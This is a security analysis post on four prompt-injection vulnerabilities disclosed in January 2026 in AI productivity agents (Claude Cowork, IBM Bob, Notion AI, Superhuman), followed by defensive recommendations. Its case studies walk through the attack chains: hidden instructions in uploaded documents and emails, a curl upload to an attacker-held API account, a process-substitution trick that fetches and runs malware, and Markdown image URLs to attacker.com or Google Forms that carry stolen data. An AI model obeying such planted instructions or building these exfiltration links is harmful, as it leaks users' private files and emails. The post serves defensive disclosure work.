Four production AI tools. Four data exfiltration vectors. One week.
Between January 7th and January 15th, 2026, security researchers publicly disclosed critical vulnerabilities in four major AI-powered productivity tools: IBM Bob, Superhuman AI, Notion AI, and Anthropic’s Claude Cowork. Each exploit demonstrated the same fundamental attack pattern—indirect prompt injection leveraging what security researcher Simon Willison has termed the “lethal trifecta”: access to private data, exposure to untrusted content, and the ability to externally communicate.
These aren’t theoretical proofs-of-concept. They’re production exploits against tools trusted by Fortune 500 companies, healthcare organizations, and government contractors. And they all share a disturbing characteristic: data exfiltration occurs before users can intervene.
The Common Thread: Understanding Indirect Prompt Injection
Traditional cybersecurity operates on clear trust boundaries. Code runs. Data doesn’t execute. Instructions come from authenticated sources.
Large language models obliterate these boundaries. An LLM cannot reliably distinguish between trusted instructions from a developer and malicious commands embedded in a PDF, email, or web page it processes. Everything is tokens. Everything can be an instruction.
The lethal trifecta materializes when three capabilities converge:
- Access to private data - Customer records, emails, financial documents, internal communications
- Exposure to untrusted content - User uploads, web searches, integrated third-party data sources
- Exfiltration vector - Any external communication channel (HTTP requests, rendered images, API calls)
When all three exist in the same context window, attackers can manipulate the AI into stealing data without exploiting a single line of vulnerable code.
Case Study 1: Claude Cowork File Exfiltration (January 13-15)
Timeline: Launched January 13, exploited January 15 Vendor Response: Known vulnerability since October 2025, deployed with issue unresolved
Anthropic’s Claude Cowork launched as a general-purpose AI agent for everyday work automation. Within 48 hours, PromptArmor demonstrated complete file exfiltration.
The Attack Vector
Claude Cowork restricts most outbound network traffic to prevent data theft. Anthropic’s own API domain (api.anthropic.com) is whitelisted as “trusted.” Attackers exploited this design decision.
Attack Chain:
- User connects Cowork to local folder containing confidential real estate files
- User uploads a malicious “skill” document (appears as legitimate Markdown, saved as .docx)
- Hidden prompt uses 1-point white-on-white text with 0.1 line spacing—effectively invisible
- User asks Cowork to analyze files using the uploaded skill
- Injection manipulates Cowork to execute:
curlcommand to Anthropic’s file upload API with attacker’s API key - Largest available file uploads to attacker’s account via Files API
- Attacker retrieves loan estimates, partial SSNs, financial data through their Anthropic dashboard
What Makes This Critical
The vulnerability was previously disclosed. Security researcher Johann Rehberger reported the Files API exfiltration flaw to Anthropic on October 25, 2025 via HackerOne. Anthropic acknowledged but did not remediate the issue.
Three months later, they launched Cowork—marketed to non-technical users for organizing desktop files—with the identical vulnerability intact. Anthropic built the tool in “a week and a half” using Claude Code, prioritizing development velocity over security remediation.
Anthropic’s official response: Users should “avoid granting access to local files with sensitive information” while simultaneously encouraging Cowork to organize your Desktop.
Even Opus 4.5, Anthropic’s most sophisticated model with enhanced reasoning capabilities, fell victim. Prompt injection exploits architectural vulnerabilities, not model intelligence gaps.
Community Discussion: HackerNews thread reached #1, generating extensive debate about AI security responsibilities.
Case Study 2: IBM Bob Malware Execution (January 7)
Timeline: Discovered during closed beta testing Vendor Response: “Unaware of the vulnerability,” despite public disclosure
IBM’s Bob coding agent, currently in closed beta, can be manipulated to download and execute arbitrary malware if users configure “always allow” for any single benign command.
The Attack Vector
Bob implements command substitution blocking via $(command) as a security measure. It failed to check for process substitution using >(command).
Attack Chain:
- User explores new GitHub repository with Bob’s assistance
- Repository README contains hidden prompt injection posing as “phishing training exercise”
- Bob prompts user with three benign
echocommands - User selects “always allow” for
echoto reduce friction - Injection delivers:
echo <(malicious_retrieval_command) | <(execution_command) - By prefixing with
echo, entire chain auto-approves without additional consent - Malware downloads and executes with user completely unaware
PromptArmor’s analysis revealed the vulnerability in minified JavaScript code:
function detectCommandSubstitution(cmd) {
if (
(ch === "$" && nxt === "(") || // $(...) detected
(ch === "<" && nxt === "(") || // <(...) detected
(ch === "`" && !inBacktick) // `...` detected
// MISSING: '>' followed by '(' for process substitution >(...)
) {
return true;
}
return false;
}
Why This Matters
Bob is positioned for enterprise software development. The attack enables:
- Ransomware execution
- Credential theft
- Device takeover
- Spyware deployment
- Botnet recruitment
IBM’s response after public disclosure: “We can’t find any record of IBM having been notified directly of this vulnerability.”
The Bob IDE also suffers from zero-click data exfiltration via Markdown image rendering with permissive Content Security Policy allowing requests to storage.googleapis.com.
Community Discussion: HackerNews thread with technical analysis of the vulnerability.
Case Study 3: Notion AI Unpatched Data Exfiltration (January 7-8)
Timeline: Reported December 24, closed as “Not Applicable” December 29, publicly disclosed January 7 Vendor Response: Initially rejected vulnerability report, remediated after public disclosure
Notion AI renders AI-generated edits before receiving user approval, creating a silent exfiltration window.
The Attack Vector
When Notion AI suggests document changes, it displays an approval prompt. Unknown to users, the edit has already been written to the document and rendered in the browser before they click Accept or Reject.
Attack Chain:
-
User uploads resume to Notion workspace (contains hidden white-on-white prompt injection)
-
User requests: “Help me update hiring tracker notes for this candidate” Injection instructs Notion AI to:
-
Extract all text from hiring tracker (salaries, candidate feedback, diversity goals, role details)
-
Construct URL:
https://attacker.com/exfil?data=[stolen_content] -
Insert as Markdown image:
 -
Browser automatically requests “image,” sending data to attacker’s server
-
Approval prompt appears—but data already exfiltrated via automatic image prefetch
-
User clicking “Reject” doesn’t matter—request already sent
PromptArmor demonstrated exfiltration of:
- Internal salary expectations
- Candidate assessment notes
- Role details and headcount planning
- Diversity hiring objectives
- Personal information about job applicants
The Disclosure Breakdown
December 24, 2025: PromptArmor reports via HackerOne December 24, 2025: Notion requests different format December 24, 2025: PromptArmor submits updated report December 29, 2025: Notion closes report as “Not Applicable” January 7, 2026: Public disclosure January 8, 2026: Notion validates vulnerability, deploys remediation
Notion has 100 million users, 4 million paying customers, and counts Amazon, Nike, Uber, and Pixar among its enterprise clients. Over half of Fortune 500 companies use the platform.
The Notion Mail AI drafting assistant exhibited similar vulnerabilities when users mentioned untrusted resources while composing emails.
Update: After reaching HackerNews front page (discussion here), Notion’s security team confirmed remediation is now in production. However, the initial “Not Applicable” response to a clearly documented vulnerability raises questions about AI security maturity in the organization.
Case Study 4: Superhuman AI Email Exfiltration (January 12)
Timeline: Disclosed January 12 Vendor Response: Treated as high-priority incident, rapid remediation
Grammarly recently acquired Superhuman, creating an AI-powered productivity suite. PromptArmor identified indirect prompt injection vulnerabilities allowing email and data exfiltration.
The Attack Vector
Superhuman whitelisted docs.google.com in its Content Security Policy. Google Forms on that domain persist data via GET requests, creating an exfiltration channel.
Attack Chain:
-
Attacker sends email containing hidden prompt injection
-
User queries: “Summarize my recent mail” Injection manipulates Superhuman AI to:
-
Find and analyze dozens of emails from past hour (financial, legal, medical content)
-
Construct pre-filled Google Form submission URL with stolen email data
-
Render URL as Markdown image:
 -
Browser automatically submits form via image request
-
Attacker reads submissions from their Google Form
Network logs showed URLs containing complete email contents—names, email addresses, sensitive communications—transmitted before any user interaction.
Extended Attack Surface
Superhuman Go (their agentic product) presented broader risks:
- Reads data from arbitrary web pages
- Connects to GSuite, Outlook, Stripe, Jira, Google Contacts
- User asks about active browser tab (online review site)
- Review site contains injection
- AI outputs 1-pixel malicious image
- Financial data from surfaced emails exfiltrates to attacker
Grammarly’s agent-powered docs showed similar Markdown image vulnerabilities, though reduced scope (only active document and queries processed, not full email access).
Vendor Response: The Exception
Superhuman handled this disclosure exceptionally well:
- Escalated to security incident response immediately
- Disabled vulnerable features at “incident pace”
- Communicated fix timelines proactively
- Demonstrated security as organizational priority
PromptArmor noted this response was “in the top percentile” for AI vulnerability disclosures.
Analysis: Simon Willison’s technical breakdown and HackerNews discussion.
The Vendor Response Spectrum
These four incidents reveal dramatically different security cultures:
Best Practice: Superhuman
- Immediate escalation and incident response
- Rapid remediation at production pace
- Proactive communication with researchers
- Security prioritized over feature availability
Delayed Recognition: Notion
- Initial dismissal of valid vulnerability report
- Remediation only after public disclosure
- Policy gap between triage and engineering teams
- Eventual proper response once validated
Known-Issue Launch: Anthropic
- Acknowledged vulnerability three months prior
- Launched product to broader audience without fix
- Development velocity prioritized over remediation
- Shifted security responsibility to end users
Awareness Failure: IBM
- Claimed no record of vulnerability notification despite public disclosure
- Product in beta with fundamental security design flaws
- Process substitution oversight in security validation code
These responses correlate directly with organizational AI security maturity and risk management priorities.
What This Means for Enterprise Security
The Uncomfortable Reality
Traditional security models assume:
- Clear trust boundaries between code and data
- Authentication validates instruction sources
- Firewalls and network segmentation contain threats
- Users can evaluate and approve risky actions
AI agents invalidate all four assumptions simultaneously.
Immediate Actions for Security Teams
1. Audit AI Agent Deployments Against Lethal Trifecta
Map every AI tool accessing:
- Private data (email, documents, databases, customer records)
- Untrusted content (user uploads, web search, third-party integrations)
- External communication (API calls, image rendering, webhooks)
Any system with all three requires immediate risk assessment.
2. Implement “Agents Rule of Two”
Inspired by Google Chrome’s security model, limit AI agents to maximum two of three properties within single session:
- Access to confidential data
- Processing untrusted content
- External communication capability
If all three required, mandate human-in-the-loop approval or session isolation.
3. Restrict Network Egress for AI Environments
Default-deny external network access from AI execution contexts. Whitelist only essential services with strict validation of:
- Destination domains
- Request parameters
- Data payloads
- API key ownership (prevent cross-account file uploads)
4. Content Security Policy Hardening
Prevent automatic rendering of untrusted images/links in AI outputs:
- Disable Markdown image auto-loading from external domains
- Require explicit user consent before external resource requests
- Implement strict CSP that blocks known exfiltration channels
5. Pre-Rendering Approval Gates
AI-generated content containing external references must receive explicit approval before being written to documents or rendered in browsers. This prevents the Notion-style attack where data exfiltrates during the approval window.
6. Tool Access Governance
Apply least-privilege principles to AI agent tool permissions:
- Separate agents for untrusted content processing vs. sensitive data access
- Time-bound credential grants
- Audit logs for all tool invocations
- Anomaly detection for unusual tool usage patterns
7. Vendor Security Assessments
Before deploying AI productivity tools:
- Request vulnerability disclosure and remediation timelines
- Evaluate track record responding to security research
- Review architecture for lethal trifecta conditions
- Contractual guarantees around security incident response
- Understand where processing occurs and data residency
The Long-Term Challenge
No current LLM architecture can reliably distinguish instructions from data. OpenAI’s CISO has acknowledged prompt injection as a “frontier security challenge” without clear solution.
Papers like “Agents Rule of Two” and Google DeepMind’s CaMeL approach offer mitigation patterns, but consensus remains: general-purpose agents cannot provide meaningful safety guarantees with current model architectures.
What’s Coming
The velocity of AI agent adoption far exceeds security tool development. We’re witnessing:
Expansion of Attack Surface:
- Model Context Protocol (MCP) enables mixing untrusted tool sources
- Multi-agent systems create distributed privilege escalation paths
- Long-term memory poisoning affects future sessions
- Tool chaining amplifies single injection into cascading exploits
Sophistication of Attacks:
- Adaptive injections that bypass detection systems
- Steganographic hiding techniques in various file formats
- Cross-agent contamination through shared context
- Social engineering targeting approval fatigue
Regulatory Pressure:
- GDPR implications for automated data exfiltration
- Healthcare compliance (HIPAA) for medical record access
- Financial services regulations (SOX, PCI-DSS)
- Potential AI-specific security mandates
The Security Researcher’s Dilemma
Four vulnerabilities. Five days. All discovered by the same team (PromptArmor).
This raises critical questions:
- How many similar vulnerabilities exist undiscovered?
- What incentivizes responsible disclosure vs. weaponization?
- Are bug bounty programs adequate for AI-specific attacks?
- Should regulatory frameworks mandate security review before AI agent launches?
The rapid deployment of AI agents into production environments—often built in “a week and a half”—suggests security research velocity lags behind development by orders of magnitude.
Recommendations for Development Teams
Architecture-First Security:
- Design against lethal trifecta from initial specification
- Separate contexts for trusted vs. untrusted content processing
- Explicit session boundaries preventing cross-contamination
- Defense-in-depth assuming prompt injection will succeed
Pre-Launch Security Review:
- Red team testing by AI security specialists
- Adversarial prompt injection test suites
- Third-party security audit before general availability
- Staged rollout with monitoring for anomalous behavior
Transparency:
- Public disclosure of AI security architecture
- Clear documentation of data access and communication capabilities
- Vulnerability disclosure program with committed response SLAs
- Regular security posture updates
Conclusion: The Permissionless AI Problem
These vulnerabilities share a fundamental characteristic: they arise from features, not bugs.
Access to email makes AI assistants useful. Web search enables research capabilities. File access allows automation. Each capability independently provides value. Combined, they create the lethal trifecta.
We’re deploying AI agents with the default assumption of broad permissions. Every new connector, every additional data source, every integration expands the attack surface. The Model Context Protocol makes mixing these capabilities trivial for end users who cannot possibly evaluate the security implications.
The uncomfortable truth: Users are combining the lethal trifecta faster than anyone can secure it.
Security teams must shift from reactive patching to proactive architecture. The question isn’t “Can this AI tool be exploited?” but rather “Under what conditions does this tool become unexploitable?”
Until LLM architectures fundamentally change, that answer involves accepting significant capability constraints. The alternative—discovered four times in five days—is production systems exfiltrating sensitive data before users finish reading the approval prompt.
About the Author: Andrew is Managing Member of QSai LLC and operates the CISO Marketplace ecosystem. With 15+ years in cybersecurity and 400+ security assessments across Fortune 100, healthcare, and critical infrastructure, he provides offensive security services, vCISO consulting, and incident response. This analysis draws from real-world penetration testing experience and continuous monitoring of the AI security threat landscape through daily cybersecurity content creation reaching 119K active users globally.
Further Reading:
Core Concepts:
- The Lethal Trifecta for AI Agents - Simon Willison’s original definition
- New Prompt Injection Papers: Agents Rule of Two - Mitigation strategies
- How the Lethal Trifecta Exposes Agentic AI - HiddenLayer enterprise analysis
- AI Security in 2026: Prompt Injection, the Lethal Trifecta, and How to Defend
Vulnerability Disclosures:
- Claude Cowork Exfiltrates Files - PromptArmor
- IBM AI (‘Bob’) Downloads and Executes Malware - PromptArmor
- Notion AI: Unpatched Data Exfiltration - PromptArmor
- Superhuman AI Exfiltrates Emails - PromptArmor
Security Research & Standards:
- OWASP Top 10 for LLM Applications 2025
- Prompt Injection Attacks: A Comprehensive Review - Academic paper covering 2023-2025
- Design Patterns for Securing LLM Agents
- OpenAI CISO on Prompt Injection Risks
News Coverage:
- The Register: Anthropic’s Files API Exfiltration Risk
- The Register: IBM’s AI Agent Bob Easily Duped
- Schneier on Security: Abusing Notion’s AI Agent
Disclosure: This analysis is based on publicly disclosed vulnerability research. No exploit code is provided. Organizations using affected platforms should review vendor security advisories and implement compensating controls pending patches.



